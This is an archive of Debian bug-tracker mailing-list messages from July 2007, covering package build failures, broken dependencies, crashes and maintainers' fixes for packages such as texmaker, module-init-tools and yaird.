2007-07-05 Thread Andreas Henriksson
According to http://lists.qgis.org/pipermail/qgis-user/2007-June/001498.html
building with QT 4.3 should be fixed in the new upstream release.

-- 
Regards,
Andreas Henriksson


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#431906: berusky: no data in levels

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 retitle 431906 berusky: unplayable on powerpc
Bug#431906: berusky: no data in levels
Changed Bug title to `berusky: unplayable on powerpc' from `berusky: no data in 
levels'.

 tags 431906 help
Bug#431906: berusky: unplayable on powerpc
There were no tags set.
Tags added: help

 stop
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#430051: marked as done (texmaker Segmentation faults)

2007-07-05 Thread Debian Bug Tracking System
Your message dated Thu, 05 Jul 2007 22:32:05 +
with message-id [EMAIL PROTECTED]
and subject line Bug#430051: fixed in texmaker 1.6-1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: texmaker
Version: 1.5-1
Severity: grave
Justification: renders package unusable

Receive a Segmentation fault when launching texmaker as a user. Launching as 
root
works but it gives the following error:

Qt: Session management error: Authentication Rejected, reason : None of the
authentication protocols specified are supported and host-based authentication
failed


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: alpha

Kernel: Linux 2.6.21.5
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages texmaker depends on:
ii  libc6.1 2.5-11   GNU C Library: Shared libraries
ii  libgcc1 1:4.2-20070609-1 GCC support library
ii  libqt4-core 4.2.3-1+b1   Qt 4 core non-GUI functionality ru
ii  libqt4-gui  4.2.3-1+b1   Qt 4 core GUI functionality runtim
ii  libstdc++6  4.2-20070609-1   The GNU Standard C++ Library v3

Versions of packages texmaker recommends:
ii  aspell   0.60.5-1GNU Aspell spell-checker
ii  gs-gpl   8.56.dfsg.1-1.1 The GPL Ghostscript PostScript int
ii  netpbm   2:10.0-11   Graphics conversion tools
ii  psutils  1.17-24 A collection of PostScript documen
ii  texlive-latex-extra  2007-3  TeX Live: LaTeX supplementary pack

-- no debconf information

---End Message---
---BeginMessage---
Source: texmaker
Source-Version: 1.6-1

We believe that the bug you reported is fixed in the latest version of
texmaker, which is due to be installed in the Debian FTP archive:

texmaker_1.6-1.diff.gz
  to pool/main/t/texmaker/texmaker_1.6-1.diff.gz
texmaker_1.6-1.dsc
  to pool/main/t/texmaker/texmaker_1.6-1.dsc
texmaker_1.6-1_i386.deb
  to pool/main/t/texmaker/texmaker_1.6-1_i386.deb
texmaker_1.6.orig.tar.gz
  to pool/main/t/texmaker/texmaker_1.6.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Joseph Smidt [EMAIL PROTECTED] (supplier of updated texmaker package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sun,  1 Jul 2007 12:58:40 -0600
Source: texmaker
Binary: texmaker
Architecture: source i386
Version: 1.6-1
Distribution: unstable
Urgency: low
Maintainer: Joseph Smidt [EMAIL PROTECTED]
Changed-By: Joseph Smidt [EMAIL PROTECTED]
Description: 
 texmaker   - A Cross-Platform LaTeX Editor
Closes: 430051
Changes: 
 texmaker (1.6-1) unstable; urgency=low
 .
   * New Upstream Release (Closes: #430051)
Files: 
 4ae117ac03055ee050f5c382fd81f91a 592 tex optional texmaker_1.6-1.dsc
 191ca21471acdb483177a0a84d7c6871 950751 tex optional texmaker_1.6.orig.tar.gz
 33f39aa5760db1c3e0b385e3719f7747 5824 tex optional texmaker_1.6-1.diff.gz
 4254a9af88fd69103bd77ac65a0cfa5b 1434710 tex optional texmaker_1.6-1_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGjWzx1FNW1LDdr0IRAo+CAJ9bWjff+/eoOeiyVs6t9h6D5V7SMwCfdTyB
DW8gTxqu2UuavGjyPJ7J6J8=
=eiCj
-END PGP SIGNATURE-

---End Message---


Bug#428650: can't install kernel

2007-07-05 Thread jidanni
Help, I cannot finish installing new kernels.

dpkg: dependency problems prevent configuration of linux-image-2.6.21-2-k7:
 linux-image-2.6.21-2-k7 depends on module-init-tools (= 0.9.13); however:
  Package module-init-tools is not configured yet.
dpkg: error processing linux-image-2.6.21-2-k7 (--configure):
 dependency problems - leaving unconfigured
dpkg: dependency problems prevent configuration of linux-image-2.6-k7:
 linux-image-2.6-k7 depends on linux-image-2.6.21-2-k7; however:
  Package linux-image-2.6.21-2-k7 is not configured yet.
dpkg: error processing linux-image-2.6-k7 (--configure):
 dependency problems - leaving unconfigured
dpkg: dependency problems prevent configuration of linux-image-k7:
 linux-image-k7 depends on linux-image-2.6-k7; however:
  Package linux-image-2.6-k7 is not configured yet.
dpkg: error processing linux-image-k7 (--configure):
 dependency problems - leaving unconfigured
Errors were encountered while processing:
 module-init-tools
 linux-image-2.6.21-2-k7
 linux-image-2.6-k7
 linux-image-k7


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#428650: can't install kernel

2007-07-05 Thread Marco d'Itri
On Jul 06, [EMAIL PROTECTED] wrote:

 Help, I cannot finish installing new kernels.
debian-user@

-- 
ciao,
Marco


signature.asc
Description: Digital signature


Bug#428650: module-init-tools: Upgrade fails: Tries to overwrite diversion of french man page

2007-07-05 Thread Steve Langasek
Hi Marco,

I think the root cause of this bug is the old bug in dpkg, whereby if a file
has been diverted on the filesystem, dpkg will not clean it up when the
owning package stops shipping it.

This bug has since been fixed in dpkg, but modutils must have stopped
shipping /usr/share/man/fr/man5/modules.5.gz some time ago (in favor of
/usr/share/man/fr/man5/modules.5).

Since the reason for removing the diversion is that module-init-tools now
conflicts with modutils, I think module-init-tools must also take
responsibility for removing the orphaned files.  A simple rm -f
/usr/share/man/${locale}man$DSECTION/$1.modutils.$DSECTION.gz before the
dpkg-divert call should be sufficient.

Frédéric's explanation for the origin of these files is also plausible, and
has the same solution.

Cheers,
-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/



Bug#428650: rm /usr/share/man/fr/man5/modules.5.gz

2007-07-05 Thread jidanni
I did
# rm /usr/share/man/fr/man5/modules.5.gz
# apt-get install
and now things are OK again.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: tagging bugs that are closed by packages in NEW as pending

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # the following bugs are closed by packages in NEW
 #
 tags 381418 pending
Bug#381418: ITP: wapiti -- Web application vulnerability scanner
There were no tags set.
Tags added: pending

 tags 430251 pending
Bug#430251: ldbl128 transition for alpha, powerpc, sparc, s390
Tags were: sid lenny
Tags added: pending

 tags 431626 pending
Bug#431626: ITP: python-boto -- Python interface to Amazon's Web Services
There were no tags set.
Tags added: pending

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431921: mlview_0.9.0-1: FTBFS: can't parse dependency zlib1g gconf2 (= 2.10.1-2)

2007-07-05 Thread Steve Langasek
Package: mlview
Version: 0.9.0-1
Severity: serious
Tags: etch-ignore

Hi Sebastien,

mvliew is currently failing to build from source, because for the first time
the ${misc:Depends} field is being populated in unstable and debian/control
incorrectly lists the dependencies as '${shlibs:Depends} ${misc:Depends}':

[...]
dh_gencontrol -pmlview 
dpkg-gencontrol: warning: can't parse dependency zlib1g gconf2 (= 2.10.1-2)
dpkg-gencontrol: error: error occurred while parsing Depends
dh_gencontrol: command returned error code 65280
[...]

A full build log can be found at
http://buildd.debian.org/fetch.cgi?pkg=mlviewarch=armver=0.9.0-1%2Bb2stamp=1182960159.

Please add the missing comma to debian/control.

Thanks,
-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431923: depends on package not in repositories

2007-07-05 Thread david downie

Package: pokerth
Version: 0.4-1
Severity: serious

pokerth depends on package libboost-thread1.33.1 which is no longer in the
repositories can you please
make it depend on libboost-thread1.34.0 instead which is in.

thanks

System Information
Debian Release: unstable
Architecture: i686
Kernel:  2.6.21-2-k7

--
my logical illogic is more logical then others illogical logic


Bug#431924: snmptrapfmt: hard-coded dependency on libsnmp9, missing ${shlibs:Depends}

2007-07-05 Thread Steve Langasek
Package: snmptrapfmt
Version: 1.11
Severity: serious
Tags: etch-ignore

Hi Jochen,

The snmptrapfmt package is uninstallable in unstable because it has the
following dependencies:

  Package: snmptrapfmt
  Depends: snmpd, libsnmp9

libsnmp9 is no longer available in unstable, having been replaced with
libsnmp10.  Because this is the result of a hard-coded dependency in
debian/control, the problem cannot be fixed in a binNMU.

There are two problems that I see with this Depends: field:

- As far as I can tell, nothing in snmptrapfmt uses libsnmp9 directly,
  either by linking against it or by dlopen()ing it.  If this is true, this
  part of the dependency line should be dropped.
- snmptrapfmt *does* build dynamically-linked ELF binaries, which means that
  the package is missing a dependency on ${shlibs:Depends}.  This is not
  optional, any such packages must at least declare their relationship to
  glibc so that packages are upgraded in the right order.

Please correct these issues.

Thanks,
-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#430186: new package with upstream patches

2007-07-05 Thread Jack Bates
I prepared a new package with Daniel's patches applied. If someone can
confirm that it resolves this bug, I will upload the new package:

http://cgi.sfu.ca/~jdbates/debian/pool/libnet-dbus-perl/

Thanks, Jack


signature.asc
Description: Digital signature


Processed: setting package to po4a, tagging 431162

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.6
 package po4a
Ignoring bugs not assigned to: po4a

 tags 431162 + pending
Bug#431162: po4a loops indefinitely while parsing options
There were no tags set.
Tags added: pending


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431927: yaird: assumes /lib/lvm, incompatible with lvm2 2.02.26

2007-07-05 Thread Steve Langasek
Package: yaird
Version: 0.0.12-20
Severity: serious
Tags: lenny sid

The current version of yaird in unstable is not compatible with the current
version of lvm2, because yaird requires /lib/lvm-200/vgchange no longer
exists, replaced by /sbin/vgchange.  This causes failures trying to generate
initramfs images on kernel install.

Please update yaird for these new paths, and/or persuade the lvm2
maintainers to maintain backwards compatibility.

-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#430252: marked as done (ldbl128 transition for alpha, powerpc, sparc, s390)

2007-07-05 Thread Debian Bug Tracking System
Your message dated Thu, 05 Jul 2007 23:12:05 -0500
with message-id [EMAIL PROTECTED]
and subject line Bug#430252: ldbl128 transition for alpha, powerpc, sparc, s390
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: libcppunit-dev
Severity: serious
User: [EMAIL PROTECTED]
Usertags: goal-ldbl128

Discussed in http://lists.debian.org/debian-devel/2007/05/msg01173.html

With glibc-2.5 and gcc-4.1.2 (and gcc-4.2), the 'long double'
data type did change from a 64bit representation to a 128bit
representation on alpha, powerpc, sparc, s390. To allow
partial upgrades of packages, we will need to rename all
packages holding libraries with the long double data type in
their API.  Both libc and libstdc++ do not need to be renamed,
because they support both representations.  We rename the library
packages on all architectures to avoid name mismatches between
architectures (you can avoid the renaming by supporting both
datatype representations in the library as done in glibc and
libstdc++, but unless a library is prepared for that, it does not
seem to be worth the effort).

It is suggested to rename a package libfoo1 to libfoo1ldbl;
please wait with the renaming if the package depends on
another library package which needs renaming.

This package has been indentified as one with header files in
/usr/include matching 'long *double'. Please close this bug report
if it is a false positive, or rename the package accordingly.

---End Message---
---BeginMessage---
On Sat, Jun 23, 2007 at 03:47:51PM +0200, Matthias Klose wrote:

 This package has been indentified as one with header files in
 /usr/include matching 'long *double'. Please close this bug report
 if it is a false positive, or rename the package accordingly.

It's a false positive: long double appears in
cppunit/portability/Stream.h, but only in code compiled conditionally
on CPPUNIT_NO_STREAM.  The Debian build doesn't define this, and uses
std::ostringstream instead of the long double-using code in Stream.h.

-Steve


signature.asc
Description: Digital signature
---End Message---


Bug#431938: devilspie: segmentation fault

2007-07-05 Thread Vladimir Z
Package: devilspie
Version: 0.20.2-1
Severity: grave
Justification: renders package unusable



-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.21.5 (PREEMPT)
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages devilspie depends on:
ii  libc6 2.5-9+b1   GNU C Library: Shared libraries
ii  libglib2.0-0  2.12.12-1  The GLib library of C routines
ii  libgtk2.0-0   2.10.13-1  The GTK+ graphical user interface 
ii  libwnck18 2.18.2-1   Window Navigator Construction Kit 
ii  libx11-6  2:1.0.3-7  X11 client-side library

devilspie recommends no packages.

-- no debconf information

devilspie crashes:

[EMAIL PROTECTED]:.devilspie$ devilspie
got eof
got eof

(devilspie:3378): Wnck-WARNING **: Unhandled action type (nil)

(devilspie:3378): Wnck-WARNING **: Unhandled action type (nil)

(devilspie:3378): Wnck-WARNING **: Unhandled action type (nil)

(devilspie:3378): Wnck-WARNING **: Unhandled action type (nil)
Segmentation fault

[EMAIL PROTECTED]:.devilspie$ ls
aterm.ds  firefox.ds  gjots  mrxvt.ds  pidgin.ds  thunderbird.ds  zim.ds
[EMAIL PROTECTED]:.devilspie$ cat aterm.ds 
(if (contains (application_name) aterm) 
(begin
(set_workspace 1))  
(maximize)
)
)
[EMAIL PROTECTED]:.devilspie$ cat firefox.ds 
; Move firefox to workspace 2
(if 
  (is (application_name) firefox-bin) 
  (set_workspace 2)
)
[EMAIL PROTECTED]:.devilspie$ cat mrxvt.ds 
(if (contains (application_name) mrxvt) 
(begin
(set_workspace 1))  
(maximize)
)
)
[EMAIL PROTECTED]:.devilspie$ cat pidgin.ds 
(if
(and 
(is (application_name) pidgin)
(is (window_name) Buddy List)
)
(set_workspace 5)   
)

cat thunderbird.ds 
(if (contains (application_name) Thunderbird) (set_workspace 2))

cat zim.ds 
(if (contains (application_name) zim) (set_workspace 3))




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]